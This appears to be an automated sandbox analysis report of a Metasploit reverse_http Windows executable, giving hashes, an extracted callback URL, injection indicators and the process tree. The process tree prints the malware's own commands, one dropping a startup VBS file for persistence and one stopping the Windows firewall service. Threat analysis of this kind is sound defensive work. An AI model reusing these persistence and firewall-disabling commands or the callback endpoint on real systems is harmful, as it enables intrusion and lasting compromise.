Analysis
- max time kernel: 150s
- max time network: 91s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 29-12-2020 17:03
Static task: static1
Behavioral task: behavioral1
- Sample: 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
- Resource: win10v20201028
General
- Target: 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
- Size: 199KB
- MD5: 5b5e120a4cf6fd359750b10a3afe5dd1
- SHA1: d54e0bb8305f468797fd03f22d64edef03fd65f3
- SHA256: 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015
- SHA512: a4e87629cb12aec6b7d280877210c241e5d9c129b099473ad3c54f2ba0ef6686d940ce8ffb9d65d2b5980e4a2441c87511d61b8fa600f63c26146b0739c6eb46
Malware Config
Extracted
- Family: metasploit
- Payload: windows/reverse_http
- URL: http://thedonald.win:443/t6pNyjKhMouuSa9I8aNlOQxTWalk1ZSCWvqscRqnGo-36PO2VBgdduQJebUNp8cgFO03Hha7yXrD9Q8hF5KFjWFydleor9rJO_IdHjJYnwDz3V3CD1ZzbMGMIRgBfd4oD91ekmuH9O36BFxS-ApQa4m-JXlszaAFF92RuNpJlwnOZQaIE
Signatures
- MetaSploit
  Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
- Executes dropped EXE (1 IoC)
  Processes (pid | process):
    1444 | 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
- YARA rule match (resource | yara_rule):
    \Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe | upx
    C:\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe | upx
- Drops startup file (1 IoC)
  Processes (description | ioc | process):
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs | cmd.exe
- Loads dropped DLL (1 IoC)
  Processes (pid | process):
    1084 | 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes (description | pid | process | target process):
    PID 1084 set thread context of 1444 | 1084 | 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe | 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes (pid | process):
    1084 | 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes (pid | process):
    1084 | 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
    1084 | 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
- Suspicious use of WriteProcessMemory (33 IoCs)
  Processes (description | pid | process | target process), identical rows collapsed with their event count:
    PID 1084 wrote to memory of 1352 | 1084 | 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe | cmd.exe (4 events)
    PID 1084 wrote to memory of 1504 | 1084 | 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe | cmd.exe (4 events)
    PID 1084 wrote to memory of 1444 | 1084 | 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe | 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe (17 events)
    PID 1504 wrote to memory of 1660 | 1504 | cmd.exe | net.exe (4 events)
    PID 1660 wrote to memory of 268 | 1660 | net.exe | net1.exe (4 events)
Processes (number gives the depth in the process tree)
1. C:\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe"
   - Loads dropped DLL
   - Suspicious use of SetThreadContext
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
      - Drops startup file
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: /c net stop MpsSvc
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\net.exe
         Command line: net stop MpsSvc
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 stop MpsSvc
   2. C:\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe"
      - Executes dropped EXE
Network
MITRE ATT&CK Matrix
Downloads
- C:\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
  MD5: 5b5e120a4cf6fd359750b10a3afe5dd1
  SHA1: d54e0bb8305f468797fd03f22d64edef03fd65f3
  SHA256: 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015
  SHA512: a4e87629cb12aec6b7d280877210c241e5d9c129b099473ad3c54f2ba0ef6686d940ce8ffb9d65d2b5980e4a2441c87511d61b8fa600f63c26146b0739c6eb46
- \Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
  MD5: 5b5e120a4cf6fd359750b10a3afe5dd1
  SHA1: d54e0bb8305f468797fd03f22d64edef03fd65f3
  SHA256: 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015
  SHA512: a4e87629cb12aec6b7d280877210c241e5d9c129b099473ad3c54f2ba0ef6686d940ce8ffb9d65d2b5980e4a2441c87511d61b8fa600f63c26146b0739c6eb46
- memory/268-11-0x0000000000000000-mapping.dmp
- memory/1352-2-0x0000000000000000-mapping.dmp
- memory/1444-5-0x0000000000400000-0x0000000000C98000-memory.dmp (Filesize: 8.6MB)
- memory/1444-6-0x00000000004010A1-mapping.dmp
- memory/1444-8-0x00000000004010A1-mapping.dmp
- memory/1444-9-0x0000000000400000-0x0000000000C98000-memory.dmp (Filesize: 8.6MB)
- memory/1504-3-0x0000000000000000-mapping.dmp
- memory/1660-10-0x0000000000000000-mapping.dmp